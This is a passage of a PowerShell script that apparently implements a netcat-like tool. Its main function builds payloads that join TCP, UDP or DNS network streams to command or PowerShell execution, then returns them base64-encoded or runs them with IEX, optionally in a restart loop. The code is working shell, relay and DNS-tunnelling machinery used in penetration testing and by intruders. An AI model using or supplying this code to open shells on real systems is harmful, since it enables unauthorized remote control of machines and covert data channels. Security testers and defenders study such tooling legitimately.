  784.           $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
  785.           if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
  786.           if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars}
  787.           $Data = $null
  788.         }
  789.         catch
  790.         {
  791.           Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
  792.         }
  793.       }
  794.     }
  795.     finally
  796.     {
  797.       try
  798.       {
  799.         #Write-Verbose "Closing Stream 2..."
  800.         Stream2_Close $Stream2Vars
  801.       }
  802.       catch
  803.       {
  804.         Write-Verbose "Failed to close Stream 2"
  805.       }
  806.       try
  807.       {
  808.         #Write-Verbose "Closing Stream 1..."
  809.         Stream1_Close $Stream1Vars
  810.       }
  811.       catch
  812.       {
  813.         Write-Verbose "Failed to close Stream 1"
  814.       }
  815.     }
  816.   }
  817.   ########## MAIN FUNCTION ##########
  818.  
  819.   ########## GENERATE PAYLOAD ##########
  820.   if($u)
  821.   {
  822.     Write-Verbose "Set Stream 1: UDP"
  823.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
  824.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
  825.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
  826.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")    
  827.     if($l){$InvokeString = "Main @('',`$True,'$p','$t') "}
  828.     else{$InvokeString = "Main @('$c',`$False,'$p','$t') "}
  829.   }
  830.   elseif($dns -ne "")
  831.   {
  832.     Write-Verbose "Set Stream 1: DNS"
  833.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
  834.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
  835.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
  836.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
  837.     if($l){return "This feature is not available."}
  838.     else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "}
  839.   }
  840.   else
  841.   {
  842.     Write-Verbose "Set Stream 1: TCP"
  843.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
  844.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
  845.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
  846.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
  847.     if($l){$InvokeString = "Main @('',`$True,$p,$t) "}
  848.     else{$InvokeString = "Main @('$c',`$False,$p,$t) "}
  849.   }
  850.  
  851.   if($e -ne "")
  852.   {
  853.     Write-Verbose "Set Stream 2: Process"
  854.     $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n")
  855.     $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_CMD} + "`n}`n`n")
  856.     $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n")
  857.     $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n")
  858.     $InvokeString += "@('$e')`n`n"
  859.   }
  860.   elseif($ep)
  861.   {
  862.     Write-Verbose "Set Stream 2: Powershell"
  863.     $InvokeString += "`n`n"
  864.   }
  865.   elseif($r -ne "")
  866.   {
  867.     if($r.split(":")[0].ToLower() -eq "udp")
  868.     {
  869.       Write-Verbose "Set Stream 2: UDP"
  870.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
  871.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
  872.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
  873.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")    
  874.       if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
  875.       elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
  876.       else{return "Bad relay format."}
  877.     }
  878.     if($r.split(":")[0].ToLower() -eq "dns")
  879.     {
  880.       Write-Verbose "Set Stream 2: DNS"
  881.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
  882.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
  883.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
  884.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
  885.       if($r.split(":").Count -eq 2){return "This feature is not available."}
  886.       elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")}
  887.       else{return "Bad relay format."}
  888.     }
  889.     elseif($r.split(":")[0].ToLower() -eq "tcp")
  890.     {
  891.       Write-Verbose "Set Stream 2: TCP"
  892.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
  893.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
  894.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
  895.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
  896.       if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
  897.       elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
  898.       else{return "Bad relay format."}
  899.     }
  900.   }
  901.   else
  902.   {
  903.     Write-Verbose "Set Stream 2: Console"
  904.     $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n")
  905.     $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n")
  906.     $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n")
  907.     $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n")
  908.     $InvokeString += ("@('" + $o + "')")
  909.   }
  910.  
  911.   if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")}
  912.   else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")}
  913.   $InvokeString = ($FunctionString + $InvokeString)
  914.   ########## GENERATE PAYLOAD ##########
  915.  
  916.   ########## RETURN GENERATED PAYLOADS ##########
  917.   if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))}
  918.   elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString}
  919.   ########## RETURN GENERATED PAYLOADS ##########
  920.  
  921.   ########## EXECUTION ##########
  922.   $Output = $null
  923.   try
  924.   {
  925.     if($rep)
  926.     {
  927.       while($True)
  928.       {
  929.         $Output += IEX $InvokeString
  930.         Start-Sleep -s 2
  931.         Write-Verbose "Repetition Enabled: Restarting..."
  932.       }
  933.     }
  934.     else
  935.     {
  936.       $Output += IEX $InvokeString
  937.     }
  938.   }
  939.   finally
  940.   {
  941.     if($Output -ne $null)
  942.     {
  943.       if($of -eq ""){$Output}
  944.       else{[io.file]::WriteAllBytes($of,$Output)}
  945.     }
  946.   }
  947.   ########## EXECUTION ##########
  948. }